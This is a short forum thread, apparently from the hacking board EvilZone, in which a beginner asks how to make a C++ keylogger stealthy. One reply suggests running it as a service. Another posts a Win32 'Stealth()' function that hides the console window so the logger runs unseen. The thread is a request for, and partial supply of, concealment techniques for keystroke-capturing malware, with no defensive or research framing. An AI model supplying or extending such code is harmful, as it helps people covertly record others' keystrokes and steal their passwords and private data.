EvilZone

Programming and Scripting => C - C++ => Topic started by: xthundemanx on December 14, 2012, 06:58:26 AM

Title: C++ stealthy keylogger
Post by: xthundemanx on December 14, 2012, 06:58:26 AM
Okay, so I know how to make a normal keylogger.


I want to know how to make one that is...stealthy.
As in it can be minimized to taskbar...and still log the keystrokes..




Im fairly nooby, so I need help getting started up ..


How to proceed ?
Title: Re: C++ stealthy keylogger
Post by: Kulverstukas on December 14, 2012, 08:34:54 AM
Proceed by making it as a service, without windows popping up.
Title: Re: C++ stealthy keylogger
Post by: Grand on December 15, 2012, 10:28:08 AM
Search for
Code: [Select]
int Save (int key_stroke, char *file);and add this under that.
Code: [Select]
void Stealth();

This where you like to.


Code: [Select]
void Stealth()
{
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(stealth,0);
}